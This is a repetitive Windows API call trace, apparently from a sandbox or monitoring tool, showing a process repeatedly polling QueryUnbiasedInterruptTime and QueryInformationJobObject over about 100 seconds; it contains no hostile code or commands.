[0209.524] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0209.524] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0209.524] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0211.603] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0211.603] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0211.604] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0213.667] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0213.667] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0213.667] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0215.713] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0215.713] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0215.713] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0216.729] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0216.729] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0216.729] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0217.733] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0217.733] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0217.733] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0219.773] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0219.773] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0219.773] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0221.812] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0221.812] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0221.813] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0223.838] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0223.838] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0223.838] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0225.875] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0225.875] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0225.876] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0227.982] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0227.982] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0227.982] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0230.014] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0230.015] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0230.015] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0232.067] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0232.067] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0232.067] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0233.116] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0233.116] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0233.116] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0234.138] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0234.138] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0234.138] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0235.163] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0235.163] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0235.163] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0236.180] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0236.181] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0236.181] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0238.297] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0238.297] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0238.298] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0240.326] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0240.326] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0240.326] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0242.360] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0242.360] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0242.361] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0244.390] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0244.390] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0244.390] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0246.428] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0246.428] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0246.428] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0248.458] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0248.458] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0248.459] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0250.489] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0250.489] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0250.489] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0251.504] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0251.505] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0251.505] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0252.653] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0252.654] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0252.654] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0254.684] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0254.684] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0254.684] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0256.725] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0256.726] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0256.726] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0258.749] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0258.749] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0258.749] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0260.773] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0260.773] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0260.773] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0262.793] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0262.794] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0262.794] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0264.827] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0264.827] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0264.827] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0266.857] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0266.857] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0266.858] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0267.876] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0267.876] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0267.877] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0268.896] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0268.896] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0268.896] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0269.912] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0269.912] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0269.912] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0270.927] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0270.928] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0270.928] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0272.954] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0272.954] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0272.954] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0274.980] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0274.980] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0274.980] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0277.010] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0277.010] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0277.011] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0279.027] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0279.027] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0279.027] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0281.143] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0281.143] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0281.143] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0283.152] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0283.153] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0283.153] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0285.184] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0285.184] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0285.184] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0286.201] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0286.201] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0286.202] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0287.217] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0287.217] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0287.217] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0290.270] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0290.270] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0290.270] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0292.301] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0292.302] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0292.302] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0294.351] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0294.351] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0294.352] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0296.380] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0296.380] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0296.381] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0298.424] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0298.424] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0298.425] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0300.446] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0300.446] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0300.447] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0306.546] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0306.547] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0306.547] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0308.578] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0308.579] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0308.579] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0310.656] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0310.657] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0310.657] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0312.679] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0312.679] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0312.680] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0314.710] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 [0314.711] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f348 | out: UnbiasedTime=0xb15718f348) returned 1 [0314.711] QueryInformationJobObject (in: hJob=0xa04, JobObjectInformationClass=0x3, lpJobObjectInformation=0xb15718f228, cbJobObjectInformationLength=0x10, lpReturnLength=0x0 | out: lpJobObjectInformation=0xb15718f228, lpReturnLength=0x0) returned 0 [0316.741] QueryUnbiasedInterruptTime (in: UnbiasedTime=0xb15718f398 | out: UnbiasedTime=0xb15718f398) returned 1 